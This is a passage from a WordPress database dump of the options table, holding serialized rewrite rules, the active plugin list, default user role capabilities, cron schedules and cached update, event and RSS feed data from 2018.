matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:3:{i:0;s:34:\"wp-clone-by-wp-academy/wpclone.php\";i:1;s:24:\"wpforms-lite/wpforms.php\";i:2;s:33:\"classic-editor/classic-editor.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','','no'),(40,'template','twentyseventeen','yes'),(41,'stylesheet','twentyseventeen','yes'),(42,'comment_whitelist','1','yes'),(43,'blacklist_keys','','no'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','38590','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','posts','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:0:{}','yes'),(80,'widget_rss','a:0:{}','yes'),(81,'uninstall_plugins','a:0:{}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','0','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','38590','yes'),(92,'wpcn_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','1','yes'),(94,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:5:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'cron','a:4:{i:1520426499;a:1:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1520426501;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1520469717;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(110,'theme_mods_twentyseventeen','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(112,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.9.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.9.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.9.4\";s:7:\"version\";s:5:\"4.9.4\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"4.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1520383300;s:15:\"version_checked\";s:5:\"4.9.4\";s:12:\"translations\";a:0:{}}','no'),(115,'_site_transient_timeout_theme_roots','1520385101','no'),(116,'_site_transient_theme_roots','a:3:{s:13:\"twentyfifteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}','no'),(117,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1520383350;s:7:\"checked\";a:3:{s:13:\"twentyfifteen\";s:3:\"1.9\";s:15:\"twentyseventeen\";s:3:\"1.4\";s:13:\"twentysixteen\";s:3:\"1.4\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(131,'_site_transient_timeout_community-events-e6bb175831e2d4a50f590f6b1c074fd7','1520426526','no'),(121,'smm_version','1.3.1','yes'),(122,'disable_smm','0','yes'),(123,'wpforms_shareasale_id','1587694','yes'),(124,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(125,'_amn_wpforms-lite_last_checked','1520380800','yes'),(127,'_site_transient_timeout_browser_bb70e527a1774e42e7a50b3821fe5168','1520988123','no'),(128,'_site_transient_browser_bb70e527a1774e42e7a50b3821fe5168','a:10:{s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"58.0\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:24:\"https://www.firefox.com/\";s:7:\"img_src\";s:44:\"http://s.w.org/images/browsers/firefox.png?1\";s:11:\"img_src_ssl\";s:45:\"https://s.w.org/images/browsers/firefox.png?1\";s:15:\"current_version\";s:2:\"56\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(129,'wpforms_review','a:2:{s:4:\"time\";i:1520383323;s:9:\"dismissed\";b:0;}','yes'),(130,'wpforms_activated','a:1:{s:4:\"lite\";i:1520383323;}','yes'),(132,'_site_transient_community-events-e6bb175831e2d4a50f590f6b1c074fd7','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:12:\"47.203.137.0\";}s:6:\"events\";a:5:{i:0;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:66:\"Ask Us Anything - WordPress Project & Support Crowdsourcing Meetup\";s:3:\"url\";s:64:\"https://www.meetup.com/WordPress-St-Petersburg/events/247914851/\";s:6:\"meetup\";s:24:\"WordPress St. Petersburg\";s:10:\"meetup_url\";s:47:\"https://www.meetup.com/WordPress-St-Petersburg/\";s:4:\"date\";s:19:\"2018-03-15 18:30:00\";s:8:\"location\";a:4:{s:8:\"location\";s:25:\"Saint Petersburg, FL, USA\";s:7:\"country\";s:2:\"us\";s:8:\"latitude\";d:27.773120999999999725105226389132440090179443359375;s:9:\"longitude\";d:-82.6366119999999995116013451479375362396240234375;}}i:1;a:7:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:14:\"WordCamp Miami\";s:3:\"url\";s:31:\"https://2018.miami.wordcamp.org\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2018-03-16 00:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:14:\"Miami, Florida\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:25.75803369999999858919181860983371734619140625;s:9:\"longitude\";d:-80.3751759000000021160303731448948383331298828125;}}i:2;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:42:\"Choosing WordPress Themes & Website Review\";s:3:\"url\";s:64:\"https://www.meetup.com/WordPress-St-Petersburg/events/248343623/\";s:6:\"meetup\";s:24:\"WordPress St. Petersburg\";s:10:\"meetup_url\";s:47:\"https://www.meetup.com/WordPress-St-Petersburg/\";s:4:\"date\";s:19:\"2018-04-05 18:30:00\";s:8:\"location\";a:4:{s:8:\"location\";s:25:\"Saint Petersburg, FL, USA\";s:7:\"country\";s:2:\"us\";s:8:\"latitude\";d:27.773120999999999725105226389132440090179443359375;s:9:\"longitude\";d:-82.6366119999999995116013451479375362396240234375;}}i:3;a:7:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:25:\"WordCamp Jacksonville, FL\";s:3:\"url\";s:38:\"https://2018.jacksonville.wordcamp.org\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2018-04-07 00:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:16:\"Jacksonville, FL\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:30.25903410000000093305061454884707927703857421875;s:9:\"longitude\";d:-81.6027782000000030393493943847715854644775390625;}}i:4;a:7:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:66:\"Ask Us Anything - WordPress Project & Support Crowdsourcing Meetup\";s:3:\"url\";s:64:\"https://www.meetup.com/WordPress-St-Petersburg/events/247914863/\";s:6:\"meetup\";s:24:\"WordPress St. Petersburg\";s:10:\"meetup_url\";s:47:\"https://www.meetup.com/WordPress-St-Petersburg/\";s:4:\"date\";s:19:\"2018-04-19 18:30:00\";s:8:\"location\";a:4:{s:8:\"location\";s:25:\"Saint Petersburg, FL, USA\";s:7:\"country\";s:2:\"us\";s:8:\"latitude\";d:27.773120999999999725105226389132440090179443359375;s:9:\"longitude\";d:-82.6366119999999995116013451479375362396240234375;}}}}','no'),(133,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1520426526','no'),(134,'_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"\n	Thu, 01 Mar 2018 08:41:16 +0000	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=5.0-alpha-42771\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:33:\"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"The Month in WordPress: February 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2018/03/the-month-in-wordpress-february-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 Mar 2018 08:41:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5613\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:324:\"Judging by the flurry of activity across the WordPress project throughout February, it looks like everyone is really getting into the swing of things for 2018. There have been a lot of interesting new developments, so read on to see what the community has been up to for the past month. WordPress 4.9.3 &#38; 4.9.4 [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh 